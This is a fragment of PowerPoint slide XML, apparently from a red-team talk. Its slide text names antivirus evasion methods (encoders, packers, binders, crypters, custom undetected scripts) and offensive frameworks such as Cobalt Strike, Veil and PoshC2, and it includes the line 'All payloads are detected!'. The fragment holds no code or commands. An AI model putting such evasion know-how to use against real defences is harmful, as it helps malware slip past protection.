          <a:xfrm>
            <a:off x="6447691" y="3011366"/>
            <a:ext cx="2314422" cy="55800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2181B92-A62D-A34A-BAA2-FD74B869B1F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6447692" y="2788581"/>
            <a:ext cx="2171700" cy="410150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DD8A599-208C-CE49-BD39-9253050B88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901" y="3351857"/>
            <a:ext cx="1001805" cy="94077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896CAC94-2FE0-3E42-8AD3-21739878E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090" y="2887469"/>
            <a:ext cx="835269" cy="8352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BF9853-6018-D94F-8CC0-8D19456BBDFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018597" y="3199487"/>
            <a:ext cx="1259910" cy="33603"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="93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8" descr="Meltdown and Spectre">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C372F3F3-14A4-2C48-9F4D-699A7AC22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11436" y="3026063"/>
            <a:ext cx="199549" cy="32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eft Bracket 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3494C9E2-6198-414F-8BDF-5B6EECAD65E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164504" y="1921037"/>
            <a:ext cx="1989166" cy="4235696"/>
          </a:xfrm>
          <a:prstGeom prst="leftBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="412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8FAE6CF-EA57-9147-BE45-79040B4A9331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3904183" y="2655183"/>
            <a:ext cx="1260320" cy="402120"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="94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8A2F85F-8567-2C49-99DD-B7966AD22C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3904182" y="3188961"/>
            <a:ext cx="1260321" cy="116142"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="94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ADE4FE6-000D-E443-A903-8EA2A888AB3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3879325" y="3421247"/>
            <a:ext cx="1285178" cy="2302207"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="94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0" name="Picture 12" descr="Download Heart Eyes Emoji | Eyes emoji, Emoji pictures, Emoji love">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90AFB05-16D2-2845-A825-23FDD9EAF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94849" y="1300888"/>
            <a:ext cx="1458951" cy="145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0334EB-D6BE-A844-8023-0A1E7746855A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8619392" y="4073990"/>
            <a:ext cx="1938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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain controller </a:t>
            </a:r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05892C1-750A-5346-B289-3DDECD303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2328" y="6139165"/>
            <a:ext cx="968938" cy="5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986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67CFC3-0413-F849-A5FC-7EF4D1F13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393361" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Antivirus Evasion Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr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6189DB-A2E2-8143-9749-B2A9C0D5F1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107" y="1837260"/>
            <a:ext cx="6107723" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encoders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Packers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Binders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crypters </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom Scripts you develop that are not yet detected (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>time consuming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NL" dirty="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 descr="Bug">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BFA1E2-3EEF-4A5E-9073-E5C88B997C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887184" y="1216485"/>
            <a:ext cx="3781051" cy="3781051"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4114800" h="5712488">
                <a:moveTo>
                  <a:pt x="133155" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3981645" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4055184" y="0"/>
                  <a:pt x="4114800" y="59616"/>
                  <a:pt x="4114800" y="133155"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4114800" y="5579333"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4114800" y="5652872"/>
                  <a:pt x="4055184" y="5712488"/>
                  <a:pt x="3981645" y="5712488"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="133155" y="5712488"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="59616" y="5712488"/>
                  <a:pt x="0" y="5652872"/>
                  <a:pt x="0" y="5579333"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="133155"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="59616"/>
                  <a:pt x="59616" y="0"/>
                  <a:pt x="133155" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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0419ED45-815C-8A41-B9B7-D6190BAD8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49" y="5529984"/>
            <a:ext cx="1883338" cy="1007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3312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530E0-1709-1346-B377-FB26FE021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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The problem ….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Media Kit - Cobalt Strike">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8988DE2D-EAD4-3B49-9A47-8F8D9575B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4" y="2653990"/>
            <a:ext cx="3152209" cy="200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96B2C4-D7BE-A24A-B489-AFF604D48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419" y="939490"/>
            <a:ext cx="3429000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4102" name="Picture 6" descr="GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D80F1805-ECF3-4B44-AF12-FEE5CE603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38" y="3757765"/>
            <a:ext cx="2819091" cy="281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oshC2 Logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468EBA8A-EE13-CF45-B175-85151699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02" y="5431897"/>
            <a:ext cx="3940098" cy="97322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D95FC16-2E0E-754C-9155-E38A9805938F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19776780">
            <a:off x="3823342" y="2145577"/>
            <a:ext cx="496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000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open-Source crypters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D29314B-65D6-F046-979E-7ABBD3EA7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74" y="5988205"/>
            <a:ext cx="1349839" cy="72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42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530E0-1709-1346-B377-FB26FE021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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Media Kit - Cobalt Strike">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8988DE2D-EAD4-3B49-9A47-8F8D9575B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74" y="2653990"/>
            <a:ext cx="3152209" cy="2000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96B2C4-D7BE-A24A-B489-AFF604D48B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419" y="939490"/>
            <a:ext cx="3429000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4102" name="Picture 6" descr="GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D80F1805-ECF3-4B44-AF12-FEE5CE603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638" y="3757765"/>
            <a:ext cx="2819091" cy="281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oshC2 Logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468EBA8A-EE13-CF45-B175-851516990C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702" y="5431897"/>
            <a:ext cx="3940098" cy="973225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5">
            <a:fgClr>
              <a:schemeClr val="tx1">
                <a:lumMod val="95000"/>
                <a:lumOff val="5000"/>
              </a:schemeClr>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:pattFill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3C32D-E640-CA43-9282-D7B6C659BDFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19776780">
            <a:off x="3654102" y="2370284"/>
            <a:ext cx="4960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4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open-Source crypters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5115ABF-4F68-484A-815F-05EC7BB3B373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1148576" y="635620"/>
            <a:ext cx="8956717" cy="5521570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6A1CE2F-6E18-B84A-ACE7-9F8D85E9D4B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1610258" y="1070517"/>
            <a:ext cx="7511440" cy="5422358"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="5080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24468CE-691F-F849-9C95-4DCFB824E7FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702527" y="1973766"/>
            <a:ext cx="11242950" cy="132343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none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NL" sz="8000" dirty="0"/>
              <a:t>All payloads are detected! </a:t>
            </a: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7C1025D6-D18F-CD4A-90D8-C0C083A91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8" y="5301039"/>
            <a:ext cx="1537423" cy="822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1173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Running a malware </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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072734" y="1909466"/>
            <a:ext cx="4046532" cy="4046532"/>
            <a:chOff x="217724" y="1657829"/>
            <a:chExt cx="4114800" cy="4114800"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Oval 2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217724" y="1657829"/>
              <a:ext cx="4114800" cy="4114800"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="01D1D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pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1000" b="1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 bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="495297" y="2044949"/>
              <a:ext cx="3571878" cy="35337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ArchUp">
                <a:avLst>
                  <a:gd name="adj" fmla="val 10872197"/>
                </a:avLst>
              </a:prstTxWarp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cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Running a malware</a:t>
              </a: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441285" y="1896303"/>
              <a:ext cx="3672890" cy="3533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rtlCol="0">
              <a:prstTxWarp prst="textArchUp">
                <a:avLst>
                  <a:gd name="adj" fmla="val 12024053"/>
                </a:avLst>
              </a:prstTxWarp>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="12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Running a malware</a:t>
              </a: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640452" y="2055209"/>
              <a:ext cx="3271645" cy="3281751"/>
              <a:chOff x="640452" y="2055209"/>
              <a:chExt cx="3271645" cy="3281751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640452" y="2055209"/>
                <a:ext cx="3271645" cy="3281751"/>
                <a:chOff x="642967" y="2002959"/>
                <a:chExt cx="3571513" cy="3182453"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="23" name="Freeform 15"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId10"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2772254" y="3020076"/>
                  <a:ext cx="1442226" cy="1940159"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="953" y="0"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="694" y="319"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="261" y="207"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="261" y="207"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="275" y="250"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="285" y="297"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="293" y="345"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="293" y="394"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="293" y="394"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="293" y="431"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="290" y="467"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="283" y="504"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="275" y="540"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="264" y="574"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="251" y="608"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="238" y="640"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="222" y="672"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="201" y="703"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="182" y="732"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="159" y="759"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="135" y="786"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="111" y="813"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="82" y="837"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="53" y="859"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="24" y="881"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="0" y="1319"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="451" y="1424"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="451" y="1424"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="515" y="1380"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="575" y="1331"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="631" y="1280"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="686" y="1227"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="736" y="1168"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="784" y="1110"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="826" y="1047"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="865" y="983"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="900" y="915"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="931" y="847"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="958" y="776"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="979" y="703"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="997" y="628"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="1011" y="550"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="1018" y="472"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="1021" y="394"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="1021" y="394"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="1018" y="343"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="1016" y="292"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="1011" y="241"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="1003" y="192"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="995" y="141"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="982" y="92"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="968" y="46"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="953" y="0"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="953" y="0"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="1021" h="1424">
                      <a:moveTo>
                        <a:pt x="953" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="694" y="319"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="261" y="207"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="261" y="207"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="275" y="250"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="285" y="297"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="293" y="345"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="293" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="293" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="293" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="290" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="275" y="540"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="264" y="574"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="251" y="608"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="238" y="640"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="222" y="672"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="201" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="182" y="732"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="159" y="759"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="786"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="111" y="813"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="82" y="837"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="859"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="881"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1319"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="1424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="1424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="1380"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="575" y="1331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="631" y="1280"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="686" y="1227"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="736" y="1168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="784" y="1110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="826" y="1047"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="865" y="983"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="900" y="915"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="931" y="847"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="958" y="776"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="979" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="997" y="628"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1011" y="550"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1018" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1021" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1021" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1018" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1016" y="292"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1011" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1003" y="192"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="995" y="141"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="982" y="92"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="968" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="953" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="953" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="80B8D6"/>
                </a:solidFill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 sz="1000">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="24" name="Group 23"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="642967" y="2002959"/>
                  <a:ext cx="3515352" cy="3182453"/>
                  <a:chOff x="642967" y="2002959"/>
                  <a:chExt cx="3515352" cy="3182453"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="25" name="Freeform 16"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId11"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2302209" y="2002959"/>
                    <a:ext cx="1856110" cy="1629517"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst/>
                    <a:ahLst/>
                    <a:cxnLst>
                      <a:cxn ang="0">
                        <a:pos x="3" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="3" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="0" y="0"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="287" y="356"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="3" y="667"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="3" y="667"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="3" y="667"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="3" y="667"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="55" y="670"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="108" y="674"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="161" y="684"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="208" y="699"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="258" y="716"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="303" y="735"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="348" y="760"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="390" y="784"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="430" y="813"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="467" y="845"/>
